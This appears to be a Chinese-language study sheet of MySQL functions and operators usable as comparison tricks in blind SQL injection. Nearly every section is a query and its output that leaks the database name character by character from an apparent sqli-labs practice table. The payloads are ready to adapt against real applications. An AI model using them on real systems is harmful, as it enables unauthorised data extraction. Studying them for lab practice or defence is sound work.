strcmp()
strcmp(str1 , str2 )
= return 0;
< return -1;
> return 1;
mysql> select strcmp((substr(database(),1,1)),0x73);
+---------------------------------------+
| strcmp((substr(database(),1,1)),0x73) |
+---------------------------------------+
| 0 |
+---------------------------------------+
1 row in set (0.00 sec)
period_diff( str1 , str2 )
# str1 - str2 ; 返回差 , 相等 返回0;
mysql> select period_diff(ascii((substr(database(),1,1))),0x73);
+---------------------------------------------------+
| period_diff(ascii((substr(database(),1,1))),0x73) |
+---------------------------------------------------+
| 0 |
+---------------------------------------------------+
1 row in set (0.00 sec)
TimeDiff( str1 , str2 )
# str1 - str2, 返回 差 , 相等 则返回 0
mysql> select timediff(ascii((substr(database(),1,1))),115);
+-----------------------------------------------+
| timediff(ascii((substr(database(),1,1))),115) |
+-----------------------------------------------+
| 00:00:00 |
+-----------------------------------------------+
1 row in set (0.00 sec)
FieLd( str0 , str1 , str2 , str3 ......)
# 判断 str0 和哪一个 字符串 相等。
# 相等 返回 下标 , 未找到,返回0
mysql> select field('a0','a1','a2','a0');
+----------------------------+
| field('a0','a1','a2','a0') |
+----------------------------+
| 3 |
+----------------------------+
1 row in set (0.00 sec)
举例用法
mysql> select field(substr(database(),1,1),'s');
+-----------------------------------+
| field(substr(database(),1,1),'s') |
+-----------------------------------+
| 1 |
+-----------------------------------+
1 row in set (0.00 sec)
like
# 相当于 1=1,like 优先级 比><= 高,
mysql> select * from users where id=1 like 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=1 like 0;
Empty set (0.00 sec)
举例应用
mysql> select * from users where id=1 like (if(substr(database(),1,1)='s',1,0));
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
rlike / regexp
BetWeen ... And ...
# test_str BETWEEN begin_str AND end_str
mysql> select '12' between '11' and '31';
+----------------------------+
| '12' between '11' and '31' |
+----------------------------+
| 1 |
+----------------------------+
1 row in set (0.00 sec)
mysql> select 'ac' between 'ab' and 'ce';
+----------------------------+
| 'ac' between 'ab' and 'ce' |
+----------------------------+
| 1 |
+----------------------------+
1 row in set (0.00 sec)
举例用法
mysql> select database() between 'a' and 'z';
+--------------------------------+
| database() between 's' and 'z' |
+--------------------------------+
| 1 |
+--------------------------------+
1 row in set (0.00 sec)
select database() between 'a' and 'z'; //1
select database() between 'b' and 'z'; //1
.........
select database() between 's' and 'z'; //1
select database() between 't' and 'z'; //0
mysql> select database() between 'sa' and 'sz';
+----------------------------------+
| database() between 'sa' and 'sz' |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
select database() between 'sa' and 'sz'; //1
select database() between 'sb' and 'sz'; //1
select database() between 'sc' and 'sz'; //1
.........
select database() between 'se' and 'sz'; //1
select database() between 'sf' and 'sz'; //0
IN
mysql> select * from users where id=1 and mid(database(),1,1) in (0x73);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=1 and mid(database(),1,2) in (0x7365);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
AND 配配合减法
#ascii('a') = 97
mysql> select * from users where id=1 and (select ascii('a')-96);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=1 and (select ascii('a')-97);
Empty set (0.00 sec)
AND 优先级高于 = ,
select * from users where id=1 and (select ascii('a')-97);
等同于
select * from users where id=(1 and (select ascii('a')-97));
异或运算 注入
# n ^ n = 0; n ^ 0 = n;
mysql> select * from users where id=1 ^ length((select database()))-8;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=1 ^ 0;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=1 xor 0;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
or 配合减法运算
mysql> select * from users where id=3 or 0;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=3 or 23;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 13 | admin4 | admin4 |
| 14 | admin5 | admin5 |
+----+----------+------------+
14 rows in set (0.00 sec)
举例使用
mysql> select * from users where id=3 or ascii(mid(database(),1,1))-115;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=3 or ascii(mid(database(),1,1))-0x73;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)
if()
mysql> select if(1=1,1,0);
+-------------+
| if(1=1,1,0) |
+-------------+
| 1 |
+-------------+
1 row in set (0.00 sec)
mysql> select if(1=2,1,0);
+-------------+
| if(1=2,1,0) |
+-------------+
| 0 |
+-------------+
1 row in set (0.00 sec)
举例使用
mysql> select * from users where id=3 and if(mid(database(),1,1)='s',1,0);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)
ifnull(表达式1,表达式2)
# 如果exp1 为null,则返回exp2的值,否则返回exp1的值
#在注入的时候,重要的是 exp1返回的是否0
mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x73,0x20);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x74,0x20);
Empty set (0.00 sec)
mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x78,0x20);
Empty set (0.02 sec)
nullif(表达式1,表达式2)
# 如果 exp1 = exp2 ,返回null, 如果不相等,返回exp1的值
# exp2 不重要
mysql> select * from users where id=3 and nullif(mid(database(),1,1)='s',2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=3 and nullif(mid(database(),1,1)='a',2);
Empty set (0.00 sec)